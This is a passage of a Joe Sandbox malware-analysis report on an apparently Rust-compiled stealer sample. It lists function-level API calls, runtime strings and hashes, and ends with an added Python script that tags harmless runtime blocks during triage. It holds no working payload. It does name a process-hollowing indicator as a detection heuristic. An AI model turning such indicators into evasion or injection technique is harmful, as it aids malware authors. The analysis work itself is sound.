                                                                        • Opcode ID: 7fbf129751144f42c01027844cdd43e1698b65de5f121e18af39eaaa71dda610
                                                                        • Instruction ID: db536ad364dc05362453e3e04fb2dbafa5912e168f80a02367775915ce043490
                                                                        • Opcode Fuzzy Hash: 7fbf129751144f42c01027844cdd43e1698b65de5f121e18af39eaaa71dda610
                                                                        • Instruction Fuzzy Hash: 4C01087C2046018FD721CF19D914752BBF1EBA0704F25C82EE85A8B6A5D7B6E884DB51

                                                                        Control-flow Graph

                                                                        Control-flow graph of c7eb20-c7f179 (rendered graph omitted; legend: Executed, Not Executed). Basic blocks call AcquireSRWLockShared, ReleaseSRWLockShared, AcquireSRWLockExclusive and ReleaseSRWLockExclusive and the local subroutines c63bc0, c61d20, c61e80, d9c300, c62260, c62420, c71340, c71330, c6fde0, da6bb0, c7df60 and b3d250.
                                                                        APIs
                                                                          • Part of subcall function 00C63BC0: TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BD0
                                                                        • AcquireSRWLockShared.KERNEL32(00EDF9F4), ref: 00C7EBDE
                                                                        • ReleaseSRWLockShared.KERNEL32(00EDF9F4), ref: 00C7ED82
                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00C7EFD0
                                                                          • Part of subcall function 00C62260: HeapFree.KERNEL32(00000000,00000000,?,00C7F171), ref: 00C6227C
                                                                          • Part of subcall function 00C62260: HeapFree.KERNEL32(00000000,?,?,00C7F171), ref: 00C62296
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Lock$FreeHeapReleaseShared$AcquireExclusiveValue
                                                                        • String ID: Box<dyn Any><unnamed>$D$cannot access a Thread Local Storage value during or after destruction/rustc/07dca489ac2d933c78d3c5158e3f43beefeb02ce\library\std\src\thread\local.rs$chunk size must be non-zero
                                                                        • API String ID: 1439667220-2585211334
                                                                        • Opcode ID: 348da9141301ce315ef42d7827a12a41883d3181f9d76fb5324608abe139f5d2
                                                                        • Instruction ID: e0e688e02e139db745d3680a9751ebced30d2d7dfd751d1b059b07f9a35af620
                                                                        • Opcode Fuzzy Hash: 348da9141301ce315ef42d7827a12a41883d3181f9d76fb5324608abe139f5d2
                                                                        • Instruction Fuzzy Hash: 0A0266B1504B408FD731CF25C485753BBE0AF99308F148A6DD8AA9BB82D7B5F509CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: UNC\$chunk size must be non-zero
                                                                        • API String ID: 0-4000572898
                                                                        • Opcode ID: 98fa011a00da7735019ba3adf2278a76569034d88758759f2c85dfbfbc36bd3a
                                                                        • Instruction ID: 01a0fc987b17ee46a5d90c5d71a5f7250039cecf25074fbd17d42359ffc0b658
                                                                        • Opcode Fuzzy Hash: 98fa011a00da7735019ba3adf2278a76569034d88758759f2c85dfbfbc36bd3a
                                                                        • Instruction Fuzzy Hash: 15F12962D0C3F049D739462D84E423AFFD28FC6319F1D8B6EF8F527292D66489419B91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 9822870e593a44490bf5777cd7b6abff51ac66ec005c5057814e2bffef870071
                                                                        • Instruction ID: decfaaee4e32d26dbacbae5355d50e9383ff09ff63ae2578832cbff33cc044c7
                                                                        • Opcode Fuzzy Hash: 9822870e593a44490bf5777cd7b6abff51ac66ec005c5057814e2bffef870071
                                                                        • Instruction Fuzzy Hash: 96F13A37A096855FC3118A7C8841459BFA29BEA208B5EC6D9E8D88F783D531CD0FC7E5

                                                                        Control-flow Graph (function c7ca40; graph image not reproduced)
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,00000000,00DA6F25), ref: 00C7CA4C
                                                                        • TlsGetValue.KERNEL32(00000000), ref: 00C7CA6A
                                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00C7CAAD
                                                                          • Part of subcall function 00DA6800: InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA683C
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA6881
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000004,00000000,?,00E9161C), ref: 00DA68DF
                                                                        • GetModuleHandleA.KERNEL32(kernel32), ref: 00C7CBA5
                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C7CBB5
                                                                        Strings
                                                                        • GetSystemTimePreciseAsFileTime, xrefs: 00C7CBAF
                                                                        • kernel32, xrefs: 00C7CBA0
                                                                        • overflow when adding duration to instantlibrary\std\src\time.rs, xrefs: 00C7CB59
                                                                        • chunk size must be non-zero, xrefs: 00C7CB8B
                                                                        Similarity
                                                                        • API ID: InitOnceValue$AllocComplete$AddressBeginHandleInitializeModuleProc
                                                                        • String ID: GetSystemTimePreciseAsFileTime$chunk size must be non-zero$kernel32$overflow when adding duration to instantlibrary\std\src\time.rs
                                                                        • API String ID: 3931988749-618619756
                                                                        • Opcode ID: 4425521ce431936c4d33f3d9e308aea961c9c183f06e3fb5f67759e907320079
                                                                        • Instruction ID: bd77a841c290e3aaa1fc25adc1e1ae3f18d1900ccd59fb1c37c45ae382411259
                                                                        • Opcode Fuzzy Hash: 4425521ce431936c4d33f3d9e308aea961c9c183f06e3fb5f67759e907320079
                                                                        • Instruction Fuzzy Hash: 3631F3717012178BCB149B79EC5A32A36D6EB85751F4AC42EF41EEB391EB34CD0187A1

                                                                        Control-flow Graph (function da6800; graph image not reproduced)
                                                                        APIs
                                                                        • InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                        • TlsAlloc.KERNEL32 ref: 00DA683C
                                                                        • InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                        • TlsAlloc.KERNEL32 ref: 00DA6881
                                                                        • TlsFree.KERNEL32 ref: 00DA68AC
                                                                        • InitOnceComplete.KERNEL32(00EDB18C,00000004,00000000,?,00E9161C), ref: 00DA68DF
                                                                        Similarity
                                                                        • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                        • String ID: chunk size must be non-zero
                                                                        • API String ID: 977713646-1054586041
                                                                        • Opcode ID: 35c6d239ca1d01445a49936fec57f08d9286d6f9e491e10543c6d1618645c2f9
                                                                        • Instruction ID: 4e1730e78504c6932f403b15d3cca8787df6d9fd18e30eb366aae267726e59d9
                                                                        • Opcode Fuzzy Hash: 35c6d239ca1d01445a49936fec57f08d9286d6f9e491e10543c6d1618645c2f9
                                                                        • Instruction Fuzzy Hash: 60318170508302EFD710DF24C84975ABBE9EB82319F28891CF5D99B2D1D774D849CBA2

                                                                        Control-flow Graph (function c7df60; graph image not reproduced)
                                                                        APIs
                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00C7E044
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C7E055
                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00C7E18F
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C7E1A0
                                                                        Strings
                                                                        • chunk size must be non-zero, xrefs: 00C7E0E7
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: chunk size must be non-zero
                                                                        • API String ID: 3298025750-1054586041
                                                                        • Opcode ID: 8f80a529df8feced26e137f6352c12a107d5ef6d94ac27275cf813a5b04fcb64
                                                                        • Instruction ID: 35584fb8b37a0914377f7bfbd94b5511432c7f7e58261ee40eb7cedd75532829
                                                                        • Opcode Fuzzy Hash: 8f80a529df8feced26e137f6352c12a107d5ef6d94ac27275cf813a5b04fcb64
                                                                        • Instruction Fuzzy Hash: 4F81F1B5D00208DFDB10CF98D989AEEBBF4FB09314F148159E819AB3A1D375AA45CF91

                                                                        Control-flow Graph (function c80230; graph image not reproduced)
                                                                        APIs
                                                                          • Part of subcall function 00C7DE20: HeapFree.KERNEL32(00000000,00000000), ref: 00C7DEE5
                                                                          • Part of subcall function 00C7DE20: HeapFree.KERNEL32(00000000,?), ref: 00C7DEF6
                                                                          • Part of subcall function 00C80230: TlsGetValue.KERNEL32(00000000,00D9BAEB,00DA674A,?,?,?,?,?,?,?,?,?,?), ref: 00C80263
                                                                        • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C80286
                                                                        • TlsSetValue.KERNEL32(-00000001,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C80300
                                                                        • TlsSetValue.KERNEL32(00000000,00000001), ref: 00C803B9
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C803E2
                                                                          • Part of subcall function 00DA6800: InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA683C
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00C80406
                                                                        Similarity
                                                                        • API ID: Value$FreeHeap$InitOnce$AllocBeginCompleteInitialize
                                                                        • String ID:
                                                                        • API String ID: 16637642-0
                                                                        • Opcode ID: b7f9045c06ee9236eb1d84aa75b2949aaa53206a1341f889801e65eae608b0fb
                                                                        • Instruction ID: 51b9ecce13780a092bb7882b0d796abaa6484999ee884b3902441259ea3bb645
                                                                        • Opcode Fuzzy Hash: b7f9045c06ee9236eb1d84aa75b2949aaa53206a1341f889801e65eae608b0fb
                                                                        • Instruction Fuzzy Hash: D051F530A00605CFDB64EF69D81976AB7B5FF45304F248429E81AEB3A0D775DD08CBA4

                                                                        Control-flow Graph (function c6fde0; graph image not reproduced)
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,80000000,00C7EFEC), ref: 00C6FDF1
                                                                        • TlsGetValue.KERNEL32(00000000,?,80000000,00C7EFEC), ref: 00C6FE1B
                                                                        • TlsSetValue.KERNEL32(00000000,00000000,?,80000000,00C7EFEC), ref: 00C6FE61
                                                                        • TlsSetValue.KERNEL32(00000000,00000001), ref: 00C6FF39
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C6FF62
                                                                          • Part of subcall function 00DA6800: InitOnceBeginInitialize.KERNEL32(00EDB18C,00000000,00000000,00000000), ref: 00DA6823
                                                                          • Part of subcall function 00DA6800: TlsAlloc.KERNEL32 ref: 00DA683C
                                                                          • Part of subcall function 00DA6800: InitOnceComplete.KERNEL32(00EDB18C,00000000,00000000), ref: 00DA6879
                                                                        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00C6FF86
                                                                        Similarity
                                                                        • API ID: Value$InitOnce$AllocBeginCompleteFreeHeapInitialize
                                                                        • String ID:
                                                                        • API String ID: 2438581317-0
                                                                        • Opcode ID: ebb679243450070f987f2c26a05f0be679a888d54ce586c5d75f1ab24092aedf
                                                                        • Instruction ID: 2b504f689d3d73e5f5ed89434e1cd5fe118601082422e6fcca46a491cc839a48
                                                                        • Opcode Fuzzy Hash: ebb679243450070f987f2c26a05f0be679a888d54ce586c5d75f1ab24092aedf
                                                                        • Instruction Fuzzy Hash: 4C41A170601206CFDB309FA9E89976A7BE9EF41310F14443DE82AE72A1C775D902C7B1

                                                                        Control-flow Graph (function c624f0; graph image not reproduced)
                                                                        APIs
                                                                          • Part of subcall function 00C61E80: HeapFree.KERNEL32(00000000,00000000), ref: 00C61EF3
                                                                          • Part of subcall function 00C61E80: HeapFree.KERNEL32(00000000,?), ref: 00C61F02
                                                                        • GetModuleHandleA.KERNEL32(ntdll), ref: 00C62565
                                                                        • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00C62575
                                                                        Similarity
                                                                        • API ID: FreeHeap$AddressHandleModuleProc
                                                                        • String ID: NtWaitForKeyedEvent$ntdll
                                                                        • API String ID: 2009576768-2815205136
                                                                        • Opcode ID: ee65185db077266bfbe5244e6927364870010aac44784d8617b5ef989cea542a
                                                                        • Instruction ID: 1ca6b72691db991bd3b0be7ebeac7742a57eac1e42db1b1a5d8c5aeb2a542832
                                                                        • Opcode Fuzzy Hash: ee65185db077266bfbe5244e6927364870010aac44784d8617b5ef989cea542a
                                                                        • Instruction Fuzzy Hash: A2014FB0109302EFD714DF21D85571B77E5EB88744F00891DF89997240EB78D9088BA2

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph (function starting at c622a0): basic blocks and edges
                                                                        • Block 458: c622a0-c622db, call c62420
                                                                        • Block 461: c622e1-c622e8
                                                                        • Block 462: c6238c-c623a3, call d9c380
                                                                        • Block 463: c6236e-c62374
                                                                        • Block 464: c622ee-c622fc
                                                                        • Block 466: c62316-c6231f
                                                                        • Block 467: c622fe
                                                                        • Block 469: c62376, call c62260
                                                                        • Block 470: c6237b-c6238b
                                                                        • Block 472: c62300-c62312, WaitOnAddress (loops on itself)
                                                                        • Block 473: c623eb-c6240d, call c624f0
                                                                        • Block 474: c62321-c6233e
                                                                        • Block 475: c6235d-c6236c
                                                                        • Block 476: c62314
                                                                        • Block 481: c623a5-c623e6, call d9bef0
                                                                        • Block 482: c62340-c62350
                                                                        • Block 483: c62417-c6241b
                                                                        • Block 484: c6240f-c62412, call c62260
                                                                        • Block 486: c62352-c6235b, CloseHandle
                                                                        • Edges: 458->461, 458->462, 461->463, 461->464, 462->473, 463->469, 463->470, 464->466, 464->467, 466->474, 466->475, 467->472, 469->470, 472->472, 472->476, 473->483, 473->484, 474->481, 474->482, 475->463, 476->463, 481->473, 482->475, 482->486, 484->483, 486->475
                                                                        APIs
                                                                        • WaitOnAddress.KERNELBASE(?,00E91650,00000001,000000FF), ref: 00C6230A
                                                                        • CloseHandle.KERNEL32(FFFFFFFF), ref: 00C62355
                                                                        Strings
                                                                        • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00C6238C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCloseHandleWait
                                                                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                        • API String ID: 592885855-1431102515
                                                                        • Opcode ID: 6f736e3d2605bbce3a78a4f784612e13d0c66620bc07185c9f8481ae9f1fe108
                                                                        • Instruction ID: 51013e591327b93d95a12fd3ee3a90c6d22e76e8731f50a4c4be526eb7674e11
                                                                        • Opcode Fuzzy Hash: 6f736e3d2605bbce3a78a4f784612e13d0c66620bc07185c9f8481ae9f1fe108
                                                                        • Instruction Fuzzy Hash: 3A41BD719016099FDB21DFA4DC81BAEBBB8FB44724F140229E4287B3E1D7756A05CBA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Control-flow graph (function starting at c63bc0): basic blocks and edges
                                                                        • Block 488: c63bc0-c63bc8
                                                                        • Block 489: c63bce
                                                                        • Block 490: c63c58-c63c62, call da6800
                                                                        • Block 491: c63bcf-c63bd9, TlsGetValue
                                                                        • Block 493: c63be6-c63bed
                                                                        • Block 494: c63bdb-c63bdf
                                                                        • Block 496: c63be1-c63be5
                                                                        • Block 497: c63c67-c63c71, call da6800
                                                                        • Block 498: c63bef
                                                                        • Block 500: c63bf0-c63bfa, TlsGetValue
                                                                        • Block 502: c63c54-c63c57
                                                                        • Block 503: c63bfc-c63c00
                                                                        • Block 504: c63c02-c63c1a, call a71220
                                                                        • Block 505: c63c3d-c63c53
                                                                        • Block 508: c63c82-c63ce7, call d9bae0
                                                                        • Block 509: c63c1c-c63c32
                                                                        • Block 510: c63c76-c63c80, call da6800
                                                                        • Block 511: c63c34
                                                                        • Block 513: c63c35-c63c37, TlsSetValue
                                                                        • Block 518: c63d09-c63d19
                                                                        • Block 519: c63ce9-c63ced
                                                                        • Block 520: c63cf4-c63cf7
                                                                        • Block 521: c63cef-c63cf2
                                                                        • Block 522: c63cfa-c63d03, HeapFree
                                                                        • Edges: 488->489, 488->490, 489->491, 490->491, 491->493, 491->494, 493->497, 493->498, 494->493, 494->496, 497->500, 498->500, 500->502, 500->503, 503->504, 503->505, 504->508, 504->509, 509->510, 509->511, 510->513, 511->513, 513->505, 508->518, 508->519, 519->520, 519->521, 520->522, 521->522, 522->518
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BD0
                                                                        • TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BF1
                                                                        • TlsSetValue.KERNEL32(00000000,00000000,?,00C7EB80), ref: 00C63C37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmp
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 3fe4d4439c4874b19c360dd1f9bfe080399ac22efcb1b3ab600fbc20afba8082
                                                                        • Instruction ID: cd83ec81b5bcd8422d1c3bc69fe4c2ec38f2fff66c9f297f9a390c84f7f5160d
                                                                        • Opcode Fuzzy Hash: 3fe4d4439c4874b19c360dd1f9bfe080399ac22efcb1b3ab600fbc20afba8082
                                                                        • Instruction Fuzzy Hash: C131C370501289EFDB20DF69E8497AA7BE8FF44310F15856AE915EB390D338DE40CBA1
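                                                                        Triage note on the three function blocks above. The first resolves NtWaitForKeyedEvent from ntdll at runtime via GetModuleHandleA and GetProcAddress, which looks like API hiding until one notices that the resolved symbol is a synchronisation primitive and that the second block (which calls the first, loops on WaitOnAddress and carries the string "use of std::thread::current() is not possible after the thread's local data has been destroyed", a panic message from the Rust standard library) and the third (TlsGetValue/TlsSetValue/HeapFree only) are thread-parking and thread-local bookkeeping. Blocks like these are consistent with compiler runtime code rather than with the stealer's own collection logic, and an analyst working through a few hundred such blocks wants them tagged automatically. The script below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it parses the report's "APIs" and "Strings" bullets (an excerpt of the three blocks above is embedded as constructed input), flags direct Nt* lookups in ntdll, known runtime strings, and blocks whose direct API set is pure housekeeping. The marker and low-interest API lists and the tag names are assumptions chosen for illustration.

```python
"""Triage helper for Joe Sandbox per-function summaries (added example,
not part of the report or of the analysed sample)."""
import re
from dataclasses import dataclass, field

# Constructed input: an excerpt of the three function blocks above, in the
# report's own format. "Control-flow Graph" separates function blocks.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00C61E80: HeapFree.KERNEL32(00000000,00000000), ref: 00C61EF3
• GetModuleHandleA.KERNEL32(ntdll), ref: 00C62565
• GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00C62575
Strings
Control-flow Graph
APIs
• WaitOnAddress.KERNELBASE(?,00E91650,00000001,000000FF), ref: 00C6230A
• CloseHandle.KERNEL32(FFFFFFFF), ref: 00C62355
Strings
• use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00C6238C
Control-flow Graph
APIs
• TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BD0
• TlsSetValue.KERNEL32(00000000,00000000,?,00C7EB80), ref: 00C63C37
"""

API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})")
STRING_RE = re.compile(r"•\s*(?P<text>.+?),\s*xrefs?:\s*(?P<ref>[0-9A-F]{8})$")

# Substrings that identify library/runtime code (assumed list for illustration).
RUNTIME_MARKERS = {"std::thread::current()": "Rust std::thread panic message"}
# APIs that on their own only do synchronisation, TLS or heap bookkeeping (assumed list).
LOW_INTEREST_APIS = {"WaitOnAddress", "WakeByAddressSingle", "WakeByAddressAll",
                     "TlsGetValue", "TlsSetValue", "TlsAlloc", "TlsFree",
                     "HeapAlloc", "HeapFree", "CloseHandle"}


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # (name, module, args, ref, is_direct)
    strings: list = field(default_factory=list)  # (text, xref)


def parse_blocks(text):
    """Split report text into FunctionBlocks holding their API and string bullets."""
    blocks, section = [FunctionBlock()], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":
            blocks.append(FunctionBlock())
            section = None
        elif line in ("APIs", "Strings"):
            section = line
        elif section == "APIs" and (m := API_RE.search(line)):
            args = [a.strip() for a in m.group("args").split(",")]
            # "Part of subcall" entries belong to a callee, not to this function.
            blocks[-1].apis.append((m.group("name"), m.group("module"), args,
                                    m.group("ref"), m.group("sub") is None))
        elif section == "Strings" and (m := STRING_RE.search(line)):
            blocks[-1].strings.append((m.group("text"), m.group("ref")))
    return blocks


def dynamic_native_imports(block):
    """Nt* names the function resolves itself via GetModuleHandleA(ntdll) + GetProcAddress.

    The sandbox prints the module handle argument as 00000000 (unknown at analysis
    time), so the pairing is made on the module string, not on the handle."""
    modules = {args[0].lower() for name, _, args, _, direct in block.apis
               if direct and name == "GetModuleHandleA" and args}
    if "ntdll" not in modules:
        return []
    return [args[-1] for name, _, args, _, direct in block.apis
            if direct and name == "GetProcAddress" and args[-1].startswith("Nt")]


def runtime_markers(block):
    """(origin, xref) for every string that matches a known runtime marker."""
    return [(origin, ref) for text, ref in block.strings
            for needle, origin in RUNTIME_MARKERS.items() if needle in text]


def triage(text):
    """Tag each function block; returns (block index, tag, detail) tuples."""
    findings = []
    for i, block in enumerate(parse_blocks(text)):
        direct = {name for name, _, _, _, is_direct in block.apis if is_direct}
        for sym in dynamic_native_imports(block):
            findings.append((i, "dynamic ntdll import", sym))
        for origin, ref in runtime_markers(block):
            findings.append((i, "runtime string", f"{origin} at {ref}"))
        if direct and direct <= LOW_INTEREST_APIS:
            findings.append((i, "housekeeping only", ", ".join(sorted(direct))))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REPORT):
        print(*finding, sep=" | ")
```

The "dynamic ntdll import" tag is deliberately reported with the resolved name rather than treated as a verdict: a lookup of NtWaitForKeyedEvent next to a WaitOnAddress loop is a fallback path for older Windows, whereas a lookup of, say, NtUnmapViewOfSection next to CreateProcess in a suspended state would deserve the analyst's attention. Keeping the "Part of subcall" entries out of the direct API set is what stops the HeapFree calls inherited from 00C61E80 from polluting the first block's classification.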